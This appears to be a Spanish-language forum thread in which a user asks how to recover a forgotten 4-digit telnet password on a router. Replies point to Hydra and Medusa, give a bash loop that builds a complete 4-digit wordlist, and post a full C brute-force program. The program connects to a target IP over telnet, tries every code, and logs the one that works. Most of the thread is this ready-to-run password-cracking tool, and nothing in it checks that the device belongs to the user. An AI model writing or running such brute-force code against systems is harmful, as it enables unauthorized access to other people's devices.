Pero el router tiene la contraseña que ya viene cuando los compras o la cambiaste y no te acuerdas?

 Que tal.

Prueba con la pass: 1234


Suerte.

Gracias por contestar a los dos.

El password no es 1234. Es numerico de 4 cifras porque me ha dicho mi primo (lo malo es que no se acuerda cual era).

Mas o menos lo tengo claro lo de por donde tiene que ir el script, pero lo que mas necesito como utilizar los comandos (for, echo, exec, telnet, etc). Nunca he programado en shell.

Seguire intentantodo, gracias por todo.

Gracias por la ayuda, pero creo que voy a utilizar Medusa, que debe de ser una aplicaion que ya lleva años, y a ver como va.

Gracias por todo y saludos.

thc hydra

 Que tal.

 Pues siguiendo la opcion obvia de Nirvas, voy a pegar un code que acabo de hacer en puro aburrimiento!
 A ver, dices que tras cuatro intentos de passwords, te pone "Bad password" y se cierra la conexion..

 El codigo que te acabo de hacer es un brute-force lame el cual manda mediante el loop for las diferentes   
 combinaciones de digitos. Dijistes que eran 4 digitos y asi lo he codeado.

 La cosa es que este code es lame por varios motivos siendo el principal mi estado de vagueza. Otro de los motivos
 es que esta pensado solo para esta situacion :__)
 Otros 3 motivos son que:

 - me baso en un string del error que suelta el Servidor al meter las passwords incorrectas. O sea, como 4 argumento
   se le debe de pasar Bad o algun string sujerente ( importan las mayusculas! ) en el error.

 - Solo he puesto que el server acepta hasta 4 intentos de login ( 4 es este caso ); por lo que serviria para un
   Servidor el cual ofreza de 1 a 4 intentos pero como digo en este caso son 4.

 - Por cada intento de autenticacion ( 1 intento == 4 oportunidades ) repito el mismo password.

 Hay otros motivos que se me pasaran, pero estos son los mas destacados. (??)

 Pues eso mismo, para ejecutar mi aplicacion deberias de hacer algo asi:

 # ./telnet-brute 84.56.54.79 23 4 Bad

 Esto es:

 -- 84.56.54.79  --> es la IP destino
 -- 23                --> es el puerto destino
 -- 4                  --> es el numero de intentos que ofrece el servidor destino
 -- Bad             --> es el string escojido desde el mensaje de error

 Pues lo que se inenta en el code es ir probando passwords, y si resulta que en una iteracion no nos suelta
 error ( conteniendo "Bad" ) supongo que hemos dado con la pass y la escribo a un archivo "password.txt".

 Es una PoC(keria) para esta situacion, nada mas. Al haberse dubitado entre un aplicacion u otra, y al estar yo
 aburrido, pues esto es lo que hay.

 Sigo diciendo que por ejemplo, si haces lo siguiente desde el command line ( # <-- es el prompt! ):

 # for ((i=0;i<=9;i++)); do
       for ((x=0;x<=9;x++)); do
           for ((z=0;z<=9;z++)); do
               for ((y=0;y<=9;y++)); do
     
       echo "$i$x$z$y" >> passwds.txt

               done
           done
       done
   done


 y tras ello usas THC Hydra y le pasas como archivo de passwords el recien creado passwds.txt, aun mejor.

 Bueno, pues aqui pego mi lame code:

/*
 *  brute-force PoC   .:: by averno ::. ( is lame! :_) )
 *
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>

#define buflen 512


char buffer[buflen];

int resolve(char *host, int port)
{

   struct sockaddr_in server;
   struct hostent *he;

   int sock;

   if ((sock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
     perror("socket()");
     exit(-1);
   }

   if ((server.sin_addr.s_addr = inet_addr(host)) == -1) {
     if ((he = gethostbyname(host)) == NULL) {
       perror("gethost()");
       exit(-1);
     }

   memcpy((char *)&server.sin_addr, (char *)he->h_addr, sizeof(server.sin_addr));
   }

   server.sin_family = AF_INET;
   server.sin_port = htons(port);
 
   if (connect(sock, (struct sockaddr *)&server, sizeof(server)) == -1) {
     perror("connect()");
     exit(-1);
   }

   return(sock);

}

void find_str(char *buff, char *buf, char *argv[])
{

   FILE *dest;

   if (strstr(buff, argv[4]) == NULL) { /* si no encontramos Bad, suponemos
                                           que encontramos la pas... */
     if ((dest = fopen("password.txt", "w")) == NULL) {
       perror("fopen()");
       exit(-1);
     }
     fprintf(dest, ": %s\n", buf);

     fclose(dest);
   }

}

char *write_to(int sock, char *buf)
{

   int readbytes;

   write(sock, buf, strlen(buf));
   sleep(1);

   while ((readbytes = read(sock, buffer, buflen-1)) != -1) {
        buffer[readbytes] = '\0';
        write(1, buffer, readbytes);
        break;
   }

   return(buffer);

}


void iterate(int sock, int iters, char *buf, char *argv[])
{

   FILE *dest;

   int i;
   char *buff;

   switch (iters) {
         
         case 1:
                buff =  write_to(sock, buf);
                find_str(buff, buf, argv);
                break;

         case 2:
                  for (i = 1; i <= 2; i++) {
                  buff =  write_to(sock, buf);
                  }
                  find_str(buff, buf, argv);
                  break;

         case 3:
                  for (i = 1; i <= 3; i++) {
                  buff =  write_to(sock, buf);
                  }
                  find_str(buff, buf, argv);
                  break;

         case 4:
                  for (i = 1; i<= 4; i++) {
                  buff =  write_to(sock, buf);
                  }
                  find_str(buff, buf, argv);
                  break;
                 
         default:
                 fprintf(stderr, "[/] The bee is giggling at you!!\n\n");
                 exit(1);
         }
 
}
   

int main(int argc, char *argv[])
{

   int a, b, c ,d;
   int i;
   char buf[buflen];
   int iters = atoi(argv[3]);

   if (argc != 5) {
     fprintf(stderr, "[/] Uso: %s <host> <port> <number_of_iterations> <string>\n\n", argv[0]);
     fprintf(stderr, "\t[/] For the argument <number_of_iterations> just write down\n\t    the numbers of tries you have when you telnet the server.\n\t    you have till 4 tries in this code.\n\n\t[/] For the <string> just write down a string in the\n"
             "\t    Default message of Error.\n\n\t[~] For example if it gives you a message like \"Bad password\", write\n\t    Bad for <string>.\n\n");
     exit(0);
   }

                /**** such a messy-avernish fprintf()!!!! :_) !! ***/

   setbuf(stdout, 0);
   fflush(stdout);

   printf("[/] Brute-Force begins now ...\n\n");

   for (a = 0; a <= 9; a++) {
      for (b = 0; b <= 9; b++) {
         for (c = 0; c <= 9; c++) {
            for (d = 0; d <= 9; d++) {

      int sock = resolve(argv[1], atoi(argv[2]));
      sleep(1);

      snprintf(buf, sizeof(buf), "password: %i%i%i%i\n", a, b, c, d);
      printf("\n[/] Intentando %s\n", buf);
     
      iterate(sock, iters, buf, argv);

      close(sock);

            }
         }
      }
   }

   return 0;

}

/* EOF */

 Si lo ejecutas sin argumentos veras la salida explicada en Ingles. Al encontrarme en UK y al ser esta mi casi
 segunda lengua, le estoy cogiendo demasiao carinho..

 Bueno, Suerte.

    /**** MODIFIKO ****/

 Ah, si te funciona dime!; si no pues mandalo a /dev/null.. :_)